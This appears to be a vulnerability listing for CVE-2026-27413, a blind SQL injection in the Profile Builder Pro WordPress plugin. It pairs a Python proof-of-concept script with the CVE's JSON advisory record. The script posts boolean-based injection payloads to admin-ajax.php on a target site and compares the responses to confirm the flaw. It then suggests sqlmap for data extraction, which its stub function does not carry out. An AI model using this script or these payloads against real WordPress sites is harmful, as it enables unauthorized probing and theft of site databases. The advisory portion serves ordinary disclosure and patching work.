CVE-2026-27413

import requests import sys # CVE-2026-27413 PoC - Profile Builder Pro Blind SQL Injection # Target: WordPress site with Profile Builder Pro plugin < 3.14.0 target_url = sys.argv[1] if len(sys.argv) > 1 else 'http://target-site.com' # Blind SQL Injection payload for boolean-based extraction # This payload tests if the vulnerability exists by checking response differences def test_vulnerability(): # Test endpoint - typically registration or profile update forms endpoint = f'{target_url}/wp-admin/admin-ajax.php' # Basic detection payload - adjust parameter names based on target payload_true = "1' AND 1=1 -- -" payload_false = "1' AND 1=2 -- -" # Common vulnerable parameters in Profile Builder Pro params = { 'action': 'pb_register_user', 'user_name': payload_true, 'email': '[email protected]', 'website': 'http://test.com' } try: print(f'[*] Testing CVE-2026-27413 on {target_url}') print(f'[*] Sending payload with TRUE condition...') response_true = requests.post(endpoint, data=params, timeout=10) params['user_name'] = payload_false print(f'[*] Sending payload with FALSE condition...') response_false = requests.post(endpoint, data=params, timeout=10) # Compare response characteristics if response_true.status_code != response_false.status_code or \ len(response_true.text) != len(response_false.text): print('[+] Potential vulnerability detected!') print('[+] Blind SQL Injection may be possible') return True else: print('[-] No obvious vulnerability detected') return False except Exception as e: print(f'[-] Error: {str(e)}') return False def extract_data(): # Example: Extract database user # This is a simplified demonstration print('[*] Extracting database information...') endpoint = f'{target_url}/wp-admin/admin-ajax.php' # Data extraction would require iterative blind injection # Each character determination requires multiple requests print('[*] Database user extraction requires iterative requests') print('[*] Consider using sqlmap for automated exploitation') if __name__ == '__main__': if test_vulnerability(): extract_data()

{"cve": {"id": "CVE-2026-27413", "sourceIdentifier": "[email protected]", "published": "2026-03-19T06:16:25.600", "lastModified": "2026-04-28T19:37:17.417", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Cozmoslabs Profile Builder Pro allows Blind SQL Injection.This issue affects Profile Builder Pro: from n/a before 3.14.0."}, {"lang": "es", "value": "Neutralización Incorrecta de Elementos Especiales utilizados en un Comando SQL ('Inyección SQL') vulnerabilidad en Cozmoslabs Profile Builder Pro permite Inyección SQL Ciega. Este problema afecta a Profile Builder Pro: desde n/a hasta 3.13.9."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://patchstack.com/database/wordpress/plugin/profile-builder-pro/vulnerability/wordpress-profile-builder-pro-plugin-3-13-9-sql-injection-vulnerability?_s_id=cve", "source": "[email protected]"}]}}